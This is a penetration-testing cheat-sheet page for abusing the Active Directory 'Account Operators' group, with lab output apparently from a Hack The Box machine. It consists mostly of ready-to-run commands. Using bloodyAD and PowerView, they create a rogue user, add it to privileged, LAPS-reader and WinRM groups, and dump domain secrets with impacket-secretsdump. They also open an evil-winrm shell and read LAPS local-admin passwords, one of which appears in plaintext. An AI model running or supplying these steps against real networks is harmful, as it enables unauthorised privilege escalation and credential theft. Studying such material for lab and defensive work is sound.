TLDRBins TLDRBins / Account Operators

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Authentication Method

Create a New User Account and Add it to Privilege Group

1. Create a New User Account

# Password
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'

Sample Output:
TO-DO
# NTLM
bloodyAD -d '<DOMAIN>' -u '<USER>' -p ':<HASH>' -f rc4 --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'

Sample Output:
TO-DO
# Password-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'

Sample Output:
TO-DO
# NTLM-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<HASH>' -f rc4 -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'

Sample Output:
TO-DO
# Ticket-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'

Sample Output:
TO-DO

2. Add the New User to Privilege Group

# Password
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'

Sample Output:
TO-DO
# NTLM
bloodyAD -d '<DOMAIN>' -u '<USER>' -p ':<HASH>' -f rc4 --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'

Sample Output:
TO-DO
# Password-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'

Sample Output:
TO-DO
# NTLM-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<HASH>' -f rc4 -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'

Sample Output:
TO-DO
# Ticket-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'

Sample Output:
TO-DO

3. Secrets Dump

# Password
impacket-secretsdump '<DOMAIN>/<NEW_USER>:<NEW_PASSWORD>@<TARGET>'

Sample Output:
TO-DO
# NTLM
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -hashes :<HASH>

Sample Output:
TO-DO
# Password-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>:<NEW_PASSWORD>@<TARGET>' -k

Sample Output:
TO-DO
# NTLM-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -hashes :<HASH> -k

Sample Output:
TO-DO
# Ticket-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -k

Sample Output:
TO-DO

1. Import PowerView.ps1

. .\PowerView.ps1

Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Create a New User Password Object

$new_user_password = ConvertTo-SecureString '<NEW_USER_PASSWORD>' -AsPlainText -Force

Sample Output:
*Evil-WinRM* PS C:\programdata> $new_user_password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force

3. Create a New User Account

New-AdUser '<NEW_USER>' -enabled $true -accountpassword $new_user_password

Sample Output:
*Evil-WinRM* PS C:\programdata> New-AdUser 'alice' -enabled $true -accountpassword $new_user_password

4. Add the New User to LAPS Group

Add-DomainGroupMember -Identity 'LAPS READ' -Members '<NEW_USER>'

Sample Output:
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'LAPS READ' -Members 'alice'

5. Add the New User to WinRM Group

Add-DomainGroupMember -Identity 'WinRM' -Members '<NEW_USER>'

Sample Output:
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity WinRM -Members 'alice'

6. Remote as New User

# Password
evil-winrm -i <TARGET> -u '<NEW_USER>' -p '<NEW_USER_PASSWORD>'

Sample Output:
$ evil-winrm -i 127.0.0.1 -u alice -p 'Test1234'              
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alice\Documents> 

# NTLM
evil-winrm -i <TARGET> -u '<NEW_USER>' -H '<NEW_HASH>'

Sample Output:
TO-DO
# Ticket-based Kerberos
evil-winrm -i <TARGET> -r <DOMAIN>

Sample Output:
TO-DO

7. Read LAPS Password

Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd

Sample Output:
*Evil-WinRM* PS C:\Users\alice\Documents> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd

DistinguishedName : CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
DNSHostName       : PivotAPI.LicorDeBellota.htb
Enabled           : True
ms-Mcs-AdmPwd     : 82SD67Cuq34TPZm4mnFo
Name              : PIVOTAPI
ObjectClass       : computer
ObjectGUID        : 98783674-e6a3-4d9e-87e3-efe5f31fabbf
SamAccountName    : PIVOTAPI$
SID               : S-1-5-21-842165252-2479896602-2762773115-1004
UserPrincipalName :